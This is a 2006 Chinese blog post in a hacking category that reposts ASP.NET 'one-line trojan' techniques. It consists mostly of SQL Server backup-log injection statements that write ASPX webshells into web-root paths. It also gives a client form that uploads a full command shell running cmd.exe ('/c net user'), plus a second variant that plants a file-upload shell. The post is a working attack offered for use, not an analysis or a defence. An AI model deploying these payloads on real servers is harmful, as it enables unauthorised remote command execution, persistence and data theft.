酒水不犯茶水
叶的离去,是风的追求还是树的不挽留?
BlogJava
|
首页
|
发新随笔
|
发新文章
|
联系
|
聚合
|
管理
随笔:325 文章:0 评论:612 引用:0
aspx的一句话木马
from:Security Box
1.相当于ASP的一句话木马:
1
alter
database
pubs
set
RECOVERY
FULL
--
2
create
table
pubs.dbo.cmd(a
image
)
3
backup
log
pubs
to
disk
=
'
c:\TM
'
with
init
4
insert
into
pubs.dbo.cmd(a)
values
(
'
<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>
'
)
5
backup
log
pubs
to
disk
=
'
d:\test11.aspx
'
mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)
1
<
form
action
=http://192.168.2.100/asp/mu.aspx
method
=post
>
2
<
b
>
在下面输入大马内容:
</
b
><
br
>
3
<
textarea
name
=l
cols
=120
rows
=35
width
=45
>
4
<%
@ Page Language
=
"
VB
"
Debug
=
"
true
"
%>
5
<%
@ import Namespace
=
"
system.IO
"
%>
6
<%
@ import Namespace
=
"
System.Diagnostics
"
%>
7
<
script
runat
="server"
>
8
Sub RunCmd(Src As Object, E As EventArgs)
9
Dim myProcess As New Process()
10
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
11
myProcessStartInfo.UseShellExecute
=
False
12
myProcessStartInfo.RedirectStandardOutput
=
true
13
myProcess.StartInfo
=
myProcessStartInfo
14
myProcessStartInfo.Arguments
=
xCmd.text
15
myProcess.Start()
16
Dim myStreamReader As StreamReader
=
myProcess.StandardOutput
17
Dim myString As String
=
myStreamReader.Readtoend()
18
myProcess.Close()
19
mystring
=
replace(mystring,
"
<
"
,
"
<
"
)
20
mystring
=
replace(mystring,
"
>
"
,
"
>
"
)
21
result.text
=
vbcrlf
&
"
<pre>
"
&
mystring
&
"
</pre>
"
22
End Sub
23
</
script
>
24
<
html
><
head
>
25
<
title
>
ASP.NET Shell for WebAdmin2.X Final
</
title
>
26
<
meta
http-equiv
="Content-Type"
c
/></
head
><
body
>
27
<
form
runat
="server"
>
28
<
asp:Label
id
="L_p"
style
="COLOR: #0000ff"
runat
="server"
width
="80px"
>
;Program
</
asp:Label
>
29
<
asp:TextBox
id
="xpath"
style
="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid"
runat
="server"
Width
="300px"
>
c:\windows\system32\cmd.exe
</
asp:TextBox
><
br
/>
30
<
asp:Label
id
="L_a"
style
="COLOR: #0000ff"
runat
="server"
width
="80px"
>
Arguments
</
asp:Label
>
31
<
asp:TextBox
id
="xcmd"
style
="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid"
runat
="server"
Width
="300px"
Text
="/c net user"
>
/c net user
</
asp:TextBox
><
br
/>
32
<
asp:Button
id
="Button"
style
="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5"
runat
="server"
Width
="100px"
Text
="Run"
></
asp:Button
><
p
>
33
<
asp:Label
id
="result"
style
="COLOR: #0000ff"
runat
="server"
></
asp:Label
>
</
p
></
form
></
body
></
html
>
34
</
textarea
><
BR
><
center
><
br
>
35
<
input
type
=submit
value
=提交
>
2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:
1
drop
table
pubs.dbo.cmd
2
alter
database
pubs
set
RECOVERY
FULL
3
create
table
pubs.dbo.cmd(a
image
)
4
backup
log
pubs
to
disk
=
'
c:\TM
'
with
init
5
insert
into
pubs.dbo.cmd(a)
values
(
'
<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>
'
)
6
backup
log
pubs
to
disk
=
'
c:\inetpub\wwwroot\test11.aspx
'
发表于 2006-11-28 00:25
009
阅读(6178)
评论(0)
编辑
收藏
所属分类:
黑客技术
新用户注册
刷新评论列表
只有注册用户
登录
后才能发表评论。
网站导航:
博客园
IT新闻
知识库
C++博客
博问
管理
相关文章:
小米手环分析
Sniffing Proprietary 2.4GHz Signals
打算做个HackRF
使用xgoldmon项目调试监控本机通信
OsmocomBB项目
Raspberry Pi 增加TFT显示
TVB-Gone 红外编码方法(每次都重新推算一遍,年纪大了还是记录一下吧)
Raspberry Pi 入手安装配置 (有图有真相)
无线键盘监听(更新 LCD 1602)
遭受 MSN D.o.S
<
2006年11月
>
日
一
二
三
四
五
六
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
公告
常用链接
我的随笔
我的评论
我的参与
最新评论
留言簿
(113)
给我留言
查看公开留言
查看私人留言
随笔分类
2D & 3D(14)
(rss)
ajax(3)
(rss)
OTHERS(82)
(rss)
UNIX(27)
(rss)
兄弟(2)
(rss)
系统编程(85)
(rss)
经验技巧(51)
(rss)
网络资源(8)
(rss)
网页编程(20)
(rss)
黑客技术(88)
(rss)
随笔档案
2021年11月 (1)
2019年7月 (1)
2018年11月 (1)
2016年2月 (1)
2015年9月 (1)
2015年5月 (1)
2015年4月 (2)
2014年10月 (1)
2014年6月 (1)
2014年5月 (1)
2014年3月 (3)
2013年11月 (2)
2013年9月 (1)
2013年6月 (1)
2013年5月 (1)
2013年4月 (1)
2012年12月 (1)
2012年11月 (1)
2012年10月 (1)
2012年8月 (1)
2012年7月 (1)
2012年5月 (2)
2012年4月 (1)
2012年3月 (1)
2011年12月 (3)
2011年11月 (2)
2011年10月 (2)
2011年7月 (2)
2011年2月 (1)
2010年11月 (2)
2010年6月 (2)
2010年5月 (1)
2010年3月 (1)
2010年2月 (1)
2010年1月 (1)
2009年11月 (1)
2009年10月 (2)
2009年9月 (2)
2009年7月 (1)
2009年4月 (1)
2009年2月 (1)
2009年1月 (1)
2008年12月 (1)
2008年10月 (5)
2008年9月 (9)
2008年8月 (6)
2008年7月 (5)
2008年6月 (2)
2008年5月 (8)
2008年4月 (4)
2008年3月 (6)
2008年2月 (5)
2008年1月 (4)
2007年12月 (22)
2007年11月 (15)
2007年10月 (3)
2007年9月 (11)
2007年8月 (40)
2007年7月 (16)
2007年6月 (5)
2007年5月 (16)
2007年4月 (15)
2007年3月 (15)
2007年2月 (4)
2007年1月 (3)
2006年12月 (22)
2006年11月 (14)
文章分类
系统编程
(rss)
网络资源
(rss)
网页编程
(rss)
黑客技术
(rss)
相册
080512汶川大地震
20130405
mypic
taobao
ubuntu
W810C
手工
画画儿
草莓音乐节
Link
动力老男孩
(rss)
爱上DIY
搜索
最新评论
1. re: OsmocomBB项目
@zhou-xuelin
哇~~~多谢多谢!!!
--009
2. re: OsmocomBB项目
评论内容较长,点击标题查看
--zhou-xuelin
3. re: OsmocomBB项目
我的显示未发现libncurse 软件包是什么原因呢
--HYH
4. re: 楼上 恶邻 小孩 奔跑 咚咚咚
楼下一群跳广场舞的怎么办?还天天循环播放那几首低俗歌
--斗鱼
5. re: 小米手环分析[未登录]
没看到闹钟的内容,根据闹钟和震动提醒功能,可以做一些应用。
--kim
阅读排行榜
1. OsmocomBB项目(51975)
2. Unicode编码表/0000-0FFF(19441)
3. 打算做个HackRF(17230)
4. 水果机密码解码 "密码公式" 看了就知道怎么打暴机了(ZT)(16123)
5. Raspberry Pi 入手安装配置 (有图有真相)(14962)
评论排行榜
1. OsmocomBB项目(118)
2. 打算做个HackRF(18)
3. 无线键盘监听(更新 LCD 1602)(15)
4. Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)(13)
5. 我是007加密后的软件密码破解(13)
2006 ©
009网站
版权没有,任意拷贝
如有意见和建议,请 E-mail 至
baicker@hotmail.com
建议使用
Firefox & 微软雅黑字体
进行浏览,最佳显示
1400*1050